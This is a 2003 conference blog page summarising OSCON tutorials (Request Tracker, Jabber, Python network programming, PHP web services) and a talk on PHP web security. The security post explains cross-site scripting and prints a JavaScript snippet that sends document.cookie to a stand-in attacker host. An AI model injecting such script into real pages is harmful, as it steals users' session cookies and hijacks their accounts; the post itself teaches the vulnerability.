Charles Engelke's Blog

July 15, 2003

OSCON 2003 Tutorials

Filed under: Ricardo Havill — Charles Engelke @ 12:52 am
Embracing and Extending RT Tutorial

Request Tracker is a customizable trouble ticketing system written in Perl.
The fundamental entity in RT is the ticket. The definition of a ticket depends on how RT is being used. For example,
customer support requests, bugs in software or items in a to-do list could be tickets in RT. RT allows user interactions to take
place with email or with a web browser.

Jabber Bootcamp

Jabber is a XML protocol for instant messaging and presence detection. The Jabber
protocol is officially known as XMPP (Extensible Messaging and Presence Protocol) by IETF. It may be used
as a substitute for programs like AOL Instant Messenger and Yahoo Messenger. Uses of Jabber are not limited to
instant messaging. Other possible uses include presence detection of devices (or people), sending structured data between
clients and a content delivery system.

Network Programming in Python

Python is a high level object oriented programming language. Simple client and
server applications can be written in Python much faster than in most languages used today. During his presentation,
Steve Holden demonstrated a client/server application, an SMTP client, a POP3 client, a FTP client, a HTTP client and
a HTTP server. The HTTP server was written with three lines of code. Copies of Steve’s demo programs may be downloaded
here.

Programming Web Services With PHP

This tutorial began with a description of the XML-RPC and SOAP protocols. The most important point discussed about
XML-RPC and SOAP was that XML-RPC is much easier to use and understand than SOAP. In many cases people have been
using SOAP when a simpler protocol like XML-RPC would suffice. The rest of the session consisted of
example PHP programs that used these protocols. The PHP SOAP extensions are usable, but they are not completely coded.
More info about this tutorial is available here

July 14, 2003

PHP Under Attack

Filed under: Ricardo Havill — Charles Engelke @ 10:15 pm

During his Thursday session at OSCON 2003, Chris Shifflett explained two types of
security vulnerabilities that may exist in a web site. The examples presented used
the PHP programming language, but these vulnerabilities may occur in CGI programs
written in any language. A copy of the presentation should be available
here.

Cross Site Scripting

Cross Site Scripting (XSS) exploits the trust a user has for a web site. It
usually involves sites displaying foreign data such as web mail applications,
web forums and guest books. XSS may be used to trick a user into executing malicious
scripts and to steal cookies. Web sites often use cookies to determine whether a
user has authorization to perform certain actions. The following Javascript code
may be used by a hacker to steal a user’s cookies:


&lt script&gt
document.location = "http://evil-cookie-monster.org/stealcookies.cgi?cookies=" + document.cookie
&lt/script&gt

(more…)

Blog at WordPress.com.